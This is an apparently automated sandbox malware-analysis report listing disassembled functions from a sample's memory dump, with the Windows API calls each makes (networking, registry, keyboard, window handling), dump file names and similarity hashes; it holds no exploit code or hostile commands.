Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 0008E2CA
MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 0008E2F0
SysAllocString.OLEAUT32(00000000), ref: 0008E2F3
SysAllocString.OLEAUT32(?), ref: 0008E311
SysFreeString.OLEAUT32(?), ref: 0008E31A
StringFromGUID2.OLE32(?,?,00000028), ref: 0008E33F
SysAllocString.OLEAUT32(?), ref: 0008E34D

Memory Dump Source

Source File: 00000013.00000002.3139857226.0000000000031000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00030000, based on PE: true

Associated: 00000013.00000002.3139832652.0000000000030000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000013.00000002.3139932233.00000000000C0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000013.00000002.3139932233.00000000000E6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000013.00000002.3139994533.00000000000F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000013.00000002.3140019337.00000000000F9000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_30000_Dicks.jbxd

Similarity

API ID: String$Alloc$ByteCharMultiWide$FreeFrom
String ID:
API String ID: 3761583154-0
Opcode ID: d945ee623d4714ed74060d9efab54c4026a0065918ef868ce6a715128792f36b
Instruction ID: ab0aae4452255683eb69fa4c7e22a2e68897ace1d664ac579d89c9e2c3694654
Opcode Fuzzy Hash: d945ee623d4714ed74060d9efab54c4026a0065918ef868ce6a715128792f36b
Instruction Fuzzy Hash: 03215176604219AFEB50EFA8DC88CBF77ECFB09360B448125FA54DB290D674AD45C760

Function 000A685E Relevance: 10.6, APIs: 7, Instructions: 94networkCOMMON

Download Yara Rule

APIs

Part of subcall function 000A8475: inet_addr.WSOCK32(00000000,?,00000000,?,?,?,00000000), ref: 000A84A0

socket.WSOCK32(00000002,00000001,00000006,?,?,00000000), ref: 000A68B1
WSAGetLastError.WSOCK32(00000000), ref: 000A68C0
ioctlsocket.WSOCK32(00000000,8004667E,00000000), ref: 000A68F9
connect.WSOCK32(00000000,?,00000010), ref: 000A6902
WSAGetLastError.WSOCK32 ref: 000A690C
closesocket.WSOCK32(00000000), ref: 000A6935
ioctlsocket.WSOCK32(00000000,8004667E,00000000), ref: 000A694E

Memory Dump Source

Source File: 00000013.00000002.3139857226.0000000000031000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00030000, based on PE: true

Associated: 00000013.00000002.3139832652.0000000000030000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000013.00000002.3139932233.00000000000C0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000013.00000002.3139932233.00000000000E6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000013.00000002.3139994533.00000000000F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000013.00000002.3140019337.00000000000F9000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_30000_Dicks.jbxd

Similarity

API ID: ErrorLastioctlsocket$closesocketconnectinet_addrsocket
String ID:
API String ID: 910771015-0
Opcode ID: 5dd6a383d200654521b81d2627046ae764a2df3db2847ec1cca77db6d7d0b172
Instruction ID: 2d0d798a75a9a4a10955a75a5095508fbfaf47561e1f56ffe3e43de8054fa251
Opcode Fuzzy Hash: 5dd6a383d200654521b81d2627046ae764a2df3db2847ec1cca77db6d7d0b172
Instruction Fuzzy Hash: 6C31A471600104AFEB109FA4CC85FBE77BDEB45725F048129F945AB291CB79AC04CBA1

Function 0008E360 Relevance: 10.6, APIs: 7, Instructions: 90memoryCOMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 0008E3A5
MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 0008E3CB
SysAllocString.OLEAUT32(00000000), ref: 0008E3CE
SysAllocString.OLEAUT32 ref: 0008E3EF
SysFreeString.OLEAUT32 ref: 0008E3F8
StringFromGUID2.OLE32(?,?,00000028), ref: 0008E412
SysAllocString.OLEAUT32(?), ref: 0008E420

Memory Dump Source

Source File: 00000013.00000002.3139857226.0000000000031000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00030000, based on PE: true

Associated: 00000013.00000002.3139832652.0000000000030000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000013.00000002.3139932233.00000000000C0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000013.00000002.3139932233.00000000000E6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000013.00000002.3139994533.00000000000F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000013.00000002.3140019337.00000000000F9000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_30000_Dicks.jbxd

Similarity

API ID: String$Alloc$ByteCharMultiWide$FreeFrom
String ID:
API String ID: 3761583154-0
Opcode ID: 0dcbb2a06034d59a2a896bb757c5f19b873b8f4992906bcfe7a9073dc4874078
Instruction ID: 5db837094b96fd846f4f5a369ded610bb0847cdd62fc72921447b10be8a1e97d
Opcode Fuzzy Hash: 0dcbb2a06034d59a2a896bb757c5f19b873b8f4992906bcfe7a9073dc4874078
Instruction Fuzzy Hash: 80218675604205AFEB50AFA8DC88DAF77ECFB09360B008525FA59CB2A1D774ED41CB64

Function 000541B9 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 24libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoInitialize,00054282,?), ref: 000541D3
GetProcAddress.KERNEL32(00000000), ref: 000541DA
EncodePointer.KERNEL32(00000000), ref: 000541E6
DecodePointer.KERNEL32(00000001,00054282,?), ref: 00054203

Strings

RoInitialize, xrefs: 000541C2
combase.dll, xrefs: 000541CE

Memory Dump Source

Source File: 00000013.00000002.3139857226.0000000000031000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00030000, based on PE: true

Associated: 00000013.00000002.3139832652.0000000000030000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000013.00000002.3139932233.00000000000C0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000013.00000002.3139932233.00000000000E6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000013.00000002.3139994533.00000000000F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000013.00000002.3140019337.00000000000F9000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_30000_Dicks.jbxd

Similarity

API ID: Pointer$AddressDecodeEncodeLibraryLoadProc
String ID: RoInitialize$combase.dll
API String ID: 3489934621-340411864
Opcode ID: 3cebf60be437cb4c78d0ebeb0d4ca454340344347e26b081d51c5deae9fc894f
Instruction ID: f1bd46510b04302eabcc36bc8ddb09e4319c480379fa8d33709e2c74e481ce60
Opcode Fuzzy Hash: 3cebf60be437cb4c78d0ebeb0d4ca454340344347e26b081d51c5deae9fc894f
Instruction Fuzzy Hash: AAE01270650741EFFB501B70ED4DF5935A8B71070BF504414BA01D51A0CBBD5185EF04

Function 0005428E Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 19libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoUninitialize,000541A8), ref: 000542A8
GetProcAddress.KERNEL32(00000000), ref: 000542AF
EncodePointer.KERNEL32(00000000), ref: 000542BA
DecodePointer.KERNEL32(000541A8), ref: 000542D5

Strings

RoUninitialize, xrefs: 00054297
combase.dll, xrefs: 000542A3

Memory Dump Source

Source File: 00000013.00000002.3139857226.0000000000031000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00030000, based on PE: true

Associated: 00000013.00000002.3139832652.0000000000030000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000013.00000002.3139932233.00000000000C0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000013.00000002.3139932233.00000000000E6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000013.00000002.3139994533.00000000000F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000013.00000002.3140019337.00000000000F9000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_30000_Dicks.jbxd

Similarity

API ID: Pointer$AddressDecodeEncodeLibraryLoadProc
String ID: RoUninitialize$combase.dll
API String ID: 3489934621-2819208100
Opcode ID: e2d2b1654fea3496cd337efd803b83fdb2094246b518cd4bf91bdb476c471f53
Instruction ID: 9f2f67019f79cad9681a81f3420eba75bd7a09b0e959843ef2a39f9c3d25907d
Opcode Fuzzy Hash: e2d2b1654fea3496cd337efd803b83fdb2094246b518cd4bf91bdb476c471f53
Instruction Fuzzy Hash: 6CE0B670651B01EFFB509B60ED0EF993AA8B700B07F504118FA01D94A0CBBD6654EA10

Function 0003218F Relevance: 9.3, APIs: 6, Instructions: 254COMMON

Download Yara Rule

APIs

GetClientRect.USER32(?,?), ref: 000321B8
GetWindowRect.USER32(?,?), ref: 000321F9
ScreenToClient.USER32(?,?), ref: 00032221
GetClientRect.USER32(?,?), ref: 00032350
GetWindowRect.USER32(?,?), ref: 00032369

Memory Dump Source

Source File: 00000013.00000002.3139857226.0000000000031000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00030000, based on PE: true

Associated: 00000013.00000002.3139832652.0000000000030000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000013.00000002.3139932233.00000000000C0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000013.00000002.3139932233.00000000000E6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000013.00000002.3139994533.00000000000F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000013.00000002.3140019337.00000000000F9000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_30000_Dicks.jbxd

Similarity

API ID: Rect$Client$Window$Screen
String ID:
API String ID: 1296646539-0
Opcode ID: 552a499c256f340bf2d06df24682a400cd5b81af04beef65bc45d3cc6337c802
Instruction ID: dbddeb0262b6f8a3d960c582a436ae6a635812fdbdd3547fd4be3dacda410207
Opcode Fuzzy Hash: 552a499c256f340bf2d06df24682a400cd5b81af04beef65bc45d3cc6337c802
Instruction Fuzzy Hash: 36B14B79900249DBDF60CFA8C9807EEB7B5FF08710F148129ED59EB254DB35AA90CB64

Function 00096A73 Relevance: 9.2, APIs: 6, Instructions: 205COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 00096BC6
_memmove.LIBCMT ref: 00096B01

Part of subcall function 00034D37: __itow.LIBCMT ref: 00034D62
Part of subcall function 00034D37: __swprintf.LIBCMT ref: 00034DAC

_memmove.LIBCMT ref: 00096B74
_memmove.LIBCMT ref: 00096C5B
_memmove.LIBCMT ref: 00096C74
_memmove.LIBCMT ref: 00096C90

Memory Dump Source

Source File: 00000013.00000002.3139857226.0000000000031000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00030000, based on PE: true

Associated: 00000013.00000002.3139832652.0000000000030000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000013.00000002.3139932233.00000000000C0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000013.00000002.3139932233.00000000000E6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000013.00000002.3139994533.00000000000F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000013.00000002.3140019337.00000000000F9000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_30000_Dicks.jbxd

Similarity

API ID: _memmove$__itow__swprintf
String ID:
API String ID: 3253778849-0
Opcode ID: 3e565685ac210e845bbe011017c515c4a5cf1181a4cbdb9c033d3fa72d8085da
Instruction ID: ee1d8571f75f346f1aa80999478196f88ecf416c2b3536d488d0693bd0899224
Opcode Fuzzy Hash: 3e565685ac210e845bbe011017c515c4a5cf1181a4cbdb9c033d3fa72d8085da
Instruction Fuzzy Hash: BE619B7150029AABCF12EF60CC82EFF37A8AF05308F044569F8596B293DB36AD45DB51

Function 000B0844 Relevance: 9.2, APIs: 6, Instructions: 167registryCOMMON

Download Yara Rule

APIs

Part of subcall function 00041A36: _memmove.LIBCMT ref: 00041A77

Part of subcall function 000B147A: CharUpperBuffW.USER32(?,?,?,?,?,?,?,000B040D,?,?), ref: 000B1491

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 000B091D
RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 000B095D
RegCloseKey.ADVAPI32(?,00000001,00000000), ref: 000B0980
RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 000B09A9
RegCloseKey.ADVAPI32(?,?,00000000), ref: 000B09EC
RegCloseKey.ADVAPI32(00000000), ref: 000B09F9

Memory Dump Source

Source File: 00000013.00000002.3139857226.0000000000031000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00030000, based on PE: true

Associated: 00000013.00000002.3139832652.0000000000030000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000013.00000002.3139932233.00000000000C0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000013.00000002.3139932233.00000000000E6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000013.00000002.3139994533.00000000000F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000013.00000002.3140019337.00000000000F9000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_30000_Dicks.jbxd

Similarity

API ID: Close$BuffCharConnectEnumOpenRegistryUpperValue_memmove
String ID:
API String ID: 4046560759-0
Opcode ID: aa19cd2b58d2dd751eaedd53c47378916cad3faec0246f926e2b4646a8e8b4ae
Instruction ID: 550c6abd3dd5ff7a465a108a6fef1d0e7fcd7757546cb4eb31ad8f3584f7b7be
Opcode Fuzzy Hash: aa19cd2b58d2dd751eaedd53c47378916cad3faec0246f926e2b4646a8e8b4ae
Instruction Fuzzy Hash: A5516971208201AFD714EF64C885EAFBBE9FF89314F04492DF599872A2DB31E905CB52

Function 000929B1 Relevance: 9.1, APIs: 6, Instructions: 138windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 000929FF
GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00092A4A
IsMenu.USER32(00000000), ref: 00092A6A
CreatePopupMenu.USER32 ref: 00092A9E
GetMenuItemCount.USER32(000000FF), ref: 00092AFC
InsertMenuItemW.USER32(00000000,?,00000001,00000030), ref: 00092B2D

Memory Dump Source

Source File: 00000013.00000002.3139857226.0000000000031000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00030000, based on PE: true

Associated: 00000013.00000002.3139832652.0000000000030000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000013.00000002.3139932233.00000000000C0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000013.00000002.3139932233.00000000000E6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000013.00000002.3139994533.00000000000F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000013.00000002.3140019337.00000000000F9000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_30000_Dicks.jbxd

Similarity

API ID: Menu$Item$CountCreateInfoInsertPopup_memset
String ID:
API String ID: 3311875123-0
Opcode ID: 4d6499066daee77894310557955b8308a0312201e982a0b64fb5472f8c91792a
Instruction ID: 6960be883a10141d96191227886965920aaa96e1108f6d630f47ead01fd55485
Opcode Fuzzy Hash: 4d6499066daee77894310557955b8308a0312201e982a0b64fb5472f8c91792a
Instruction Fuzzy Hash: D251DD70A0030AFFDF25DF68D888BAEBBF4EF54314F104159E8159B2A2E7709944EB52

Function 0008C329 Relevance: 9.0, APIs: 6, Instructions: 49COMMON

Download Yara Rule

APIs

GetDC.USER32(00000000), ref: 0008C34E
GetDeviceCaps.GDI32(00000000,00000058), ref: 0008C35F
GetDeviceCaps.GDI32(00000000,0000005A), ref: 0008C366
ReleaseDC.USER32(00000000,00000000), ref: 0008C36E
MulDiv.KERNEL32(000009EC,?,00000000), ref: 0008C385
MulDiv.KERNEL32(000009EC,?,?), ref: 0008C397

Memory Dump Source

Source File: 00000013.00000002.3139857226.0000000000031000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00030000, based on PE: true

Associated: 00000013.00000002.3139832652.0000000000030000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000013.00000002.3139932233.00000000000C0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000013.00000002.3139932233.00000000000E6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000013.00000002.3139994533.00000000000F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000013.00000002.3140019337.00000000000F9000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_30000_Dicks.jbxd

Similarity

API ID: CapsDevice$Release
String ID:
API String ID: 1035833867-0
Opcode ID: 8fe22b77f42c7c97074d03290da3aef9b5618e916724a102a9b9e3c103d98ce9
Instruction ID: 72ce14087913c4554ba9c6e8493056fd64441e2bdd982105d0da61970be49c5c
Opcode Fuzzy Hash: 8fe22b77f42c7c97074d03290da3aef9b5618e916724a102a9b9e3c103d98ce9
Instruction Fuzzy Hash: CC014475E00318BBEF109FA59C49E5EBFB8EB58751F144065FA08AB281D6749D11CFA0

Function 000BC552 Relevance: 9.0, APIs: 6, Instructions: 49COMMON

Download Yara Rule

APIs

Part of subcall function 000316CF: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00031729
Part of subcall function 000316CF: SelectObject.GDI32(?,00000000), ref: 00031738
Part of subcall function 000316CF: BeginPath.GDI32(?), ref: 0003174F
Part of subcall function 000316CF: SelectObject.GDI32(?,00000000), ref: 00031778

MoveToEx.GDI32(00000000,-00000002,?,00000000), ref: 000BC57C
LineTo.GDI32(00000000,00000003,?), ref: 000BC590
MoveToEx.GDI32(00000000,00000000,?,00000000), ref: 000BC59E
LineTo.GDI32(00000000,00000000,?), ref: 000BC5AE
EndPath.GDI32(00000000), ref: 000BC5BE
StrokePath.GDI32(00000000), ref: 000BC5CE

Memory Dump Source

Source File: 00000013.00000002.3139857226.0000000000031000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00030000, based on PE: true

Associated: 00000013.00000002.3139832652.0000000000030000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000013.00000002.3139932233.00000000000C0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000013.00000002.3139932233.00000000000E6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000013.00000002.3139994533.00000000000F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000013.00000002.3140019337.00000000000F9000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_30000_Dicks.jbxd

Similarity

API ID: Path$LineMoveObjectSelect$BeginCreateStroke
String ID:
API String ID: 43455801-0
Opcode ID: b167fcbbde2f96892e4afe797f300c99536916ba83787326bf1d431e12568412
Instruction ID: 4b12b087d6847baa31f7b6887dafbf02d39bc3933bbd1577325c6755f69213a7
Opcode Fuzzy Hash: b167fcbbde2f96892e4afe797f300c99536916ba83787326bf1d431e12568412
Instruction Fuzzy Hash: D8111B7200010DFFEF129F90DC88FEA7FADEB08354F048021BA585A160C775AE95DBA0

Function 000507BB Relevance: 9.0, APIs: 6, Instructions: 44keyboardCOMMON

Download Yara Rule

APIs

MapVirtualKeyW.USER32(0000005B,00000000), ref: 000507EC
MapVirtualKeyW.USER32(00000010,00000000), ref: 000507F4
MapVirtualKeyW.USER32(000000A0,00000000), ref: 000507FF
MapVirtualKeyW.USER32(000000A1,00000000), ref: 0005080A
MapVirtualKeyW.USER32(00000011,00000000), ref: 00050812
MapVirtualKeyW.USER32(00000012,00000000), ref: 0005081A

Memory Dump Source

Source File: 00000013.00000002.3139857226.0000000000031000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00030000, based on PE: true

Associated: 00000013.00000002.3139832652.0000000000030000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000013.00000002.3139932233.00000000000C0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000013.00000002.3139932233.00000000000E6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000013.00000002.3139994533.00000000000F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000013.00000002.3140019337.00000000000F9000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_30000_Dicks.jbxd

Similarity

API ID: Virtual
String ID:
API String ID: 4278518827-0
Opcode ID: 31581649ae55e551075f2f8fffc59f58c7cc70e7086663b529a4b31d19f5cc1e
Instruction ID: 699535ed3d296fe035748afc470f184a48df4f1380d1c813515318470edb8451
Opcode Fuzzy Hash: 31581649ae55e551075f2f8fffc59f58c7cc70e7086663b529a4b31d19f5cc1e
Instruction Fuzzy Hash: 20016CB0901759BDE3008F5A8C85B52FFA8FF59354F00411BA15C47941C7F5A864CBE5

Function 000B6A0C Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 80windowlibraryCOMMON

Download Yara Rule

APIs

Part of subcall function 00032111: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 0003214F
Part of subcall function 00032111: GetStockObject.GDI32(00000011), ref: 00032163
Part of subcall function 00032111: SendMessageW.USER32(00000000,00000030,00000000), ref: 0003216D

SendMessageW.USER32(00000000,00000467,00000000,?), ref: 000B6A86
LoadLibraryW.KERNEL32(?), ref: 000B6A8D
SendMessageW.USER32(?,00000467,00000000,00000000), ref: 000B6AA2
DestroyWindow.USER32(?), ref: 000B6AAA

Strings

SysAnimate32, xrefs: 000B6A61

Memory Dump Source

Source File: 00000013.00000002.3139857226.0000000000031000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00030000, based on PE: true

Associated: 00000013.00000002.3139832652.0000000000030000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000013.00000002.3139932233.00000000000C0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000013.00000002.3139932233.00000000000E6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000013.00000002.3139994533.00000000000F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000013.00000002.3140019337.00000000000F9000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_30000_Dicks.jbxd

Similarity

API ID: MessageSend$Window$CreateDestroyLibraryLoadObjectStock
String ID: SysAnimate32
API String ID: 4146253029-1011021900
Opcode ID: 762d23b3a66e09e7ed148577bb83c2210b8f6655c8416a40d2f021a245e19732
Instruction ID: c0a3b089feb902745f194ae0fbce396807ea674c7ee095d4032bccb2da7aacef
Opcode Fuzzy Hash: 762d23b3a66e09e7ed148577bb83c2210b8f6655c8416a40d2f021a245e19732
Instruction Fuzzy Hash: 09219A71200205AFEF608FA4DC80EFB77EDEF59324F148618FA51A2190D37ADC519B62

Function 000922E7 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 49COMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?), ref: 00092318

Strings

EXISTS, xrefs: 00092340
KEYS, xrefs: 0009232F
REMOVE, xrefs: 0009231E
APPEND, xrefs: 00092351

Memory Dump Source

Source File: 00000013.00000002.3139857226.0000000000031000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00030000, based on PE: true

Associated: 00000013.00000002.3139832652.0000000000030000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000013.00000002.3139932233.00000000000C0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000013.00000002.3139932233.00000000000E6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000013.00000002.3139994533.00000000000F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000013.00000002.3140019337.00000000000F9000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_30000_Dicks.jbxd

Similarity

API ID: BuffCharUpper
String ID: APPEND$EXISTS$KEYS$REMOVE
API String ID: 3964851224-769500911
Opcode ID: c2807fec3c245dc47d5cb6a20062913acaff4a50d95217c6c77eb385cacfd23e
Instruction ID: 512bd8341b61881aef83b3be49f699816ed38bd703a82f193682af78f302e4e0
Opcode Fuzzy Hash: c2807fec3c245dc47d5cb6a20062913acaff4a50d95217c6c77eb385cacfd23e
Instruction Fuzzy Hash: 2D112D70900119EFCF40EFA4D9528EEB7B4FF16344F5084A9E815A7262EB366E0ADF50

Function 000B0697 Relevance: 7.6, APIs: 5, Instructions: 144registryCOMMON

Download Yara Rule

APIs

Part of subcall function 00041A36: _memmove.LIBCMT ref: 00041A77

Part of subcall function 000B147A: CharUpperBuffW.USER32(?,?,?,?,?,?,?,000B040D,?,?), ref: 000B1491

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 000B075D
RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 000B079C
RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 000B07E3
RegCloseKey.ADVAPI32(?,?), ref: 000B080F
RegCloseKey.ADVAPI32(00000000), ref: 000B081C

Memory Dump Source

Source File: 00000013.00000002.3139857226.0000000000031000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00030000, based on PE: true

Associated: 00000013.00000002.3139832652.0000000000030000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000013.00000002.3139932233.00000000000C0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000013.00000002.3139932233.00000000000E6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000013.00000002.3139994533.00000000000F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000013.00000002.3140019337.00000000000F9000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_30000_Dicks.jbxd

Similarity

API ID: Close$BuffCharConnectEnumOpenRegistryUpper_memmove
String ID:
API String ID: 3440857362-0
Opcode ID: 7892679dabc3c5610c75c98627fb638e77867de82690f2318af3a5b9ebf5f6fb
Instruction ID: 1fc5c97cd46f47c2132b150bda79fd8664c9ecfcd5b02aed17c5da73ee9abf13
Opcode Fuzzy Hash: 7892679dabc3c5610c75c98627fb638e77867de82690f2318af3a5b9ebf5f6fb
Instruction Fuzzy Hash: 78515871608204AFD714EF64C885FAFB7E9BF88304F14892DF596972A2DB30E945CB52

Function 000BA67B Relevance: 7.6, APIs: 5, Instructions: 130COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000013.00000002.3139857226.0000000000031000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00030000, based on PE: true

Associated: 00000013.00000002.3139832652.0000000000030000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000013.00000002.3139932233.00000000000C0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000013.00000002.3139932233.00000000000E6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000013.00000002.3139994533.00000000000F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000013.00000002.3140019337.00000000000F9000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_30000_Dicks.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bc7d5f4481d55cda888b74f155090ac5a58e4d2c05d9ad208551a4861ebc2e3e
Instruction ID: 2053bc3b4781213643542ce94d3efc6b2755d7d9adfeb27d42e81af46359c20d
Opcode Fuzzy Hash: bc7d5f4481d55cda888b74f155090ac5a58e4d2c05d9ad208551a4861ebc2e3e
Instruction Fuzzy Hash: 6941C375A4C214AFD760DB28CC88FEABBF8EB0B350F140165E91AA72D1CA749D41DA51

Function 00032714 Relevance: 7.6, APIs: 5, Instructions: 111keyboardCOMMON

Download Yara Rule

APIs

GetCursorPos.USER32(?), ref: 00032727
ScreenToClient.USER32(000F77B0,?), ref: 00032744
GetAsyncKeyState.USER32(00000001), ref: 00032769
GetAsyncKeyState.USER32(00000002), ref: 00032777

Memory Dump Source

Source File: 00000013.00000002.3139857226.0000000000031000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00030000, based on PE: true

Associated: 00000013.00000002.3139832652.0000000000030000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000013.00000002.3139932233.00000000000C0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000013.00000002.3139932233.00000000000E6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000013.00000002.3139994533.00000000000F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000013.00000002.3140019337.00000000000F9000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_30000_Dicks.jbxd

Similarity

